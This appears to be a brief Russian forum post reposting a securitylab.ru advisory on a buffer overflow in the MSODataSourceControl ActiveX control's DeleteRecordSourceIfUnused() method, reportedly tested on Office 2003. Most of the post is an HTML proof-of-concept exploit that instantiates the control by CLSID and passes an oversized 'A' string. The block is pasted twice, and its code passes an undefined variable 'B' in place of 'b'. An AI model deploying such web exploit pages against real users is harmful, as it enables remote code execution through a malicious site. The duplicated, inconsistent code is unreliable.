Уязвимость существует из-за ошибки в функции DeleteRecordSourceIfUnused() в MSODataSourceControl ActiveX компоненте. Удаленный пользователь может с помощью специально сформированного Web страницы вызвать переполнение буфера и выполнить произвольный код на целевой системе.
провенно тока на Office 2003
exp(html):
Цитата
<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}">
</object>
<script language="javascript">
var b = 'AAAA'; while (b.length <= 256) b+=b; ctl.DeleteRecordSourceIfUnused(B);
</script>
</html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}">
</object>
<script language="javascript">
var b = 'AAAA'; while (b.length <= 256) b+=b; ctl.DeleteRecordSourceIfUnused(B);
</script>
</html>
©securitylab.ru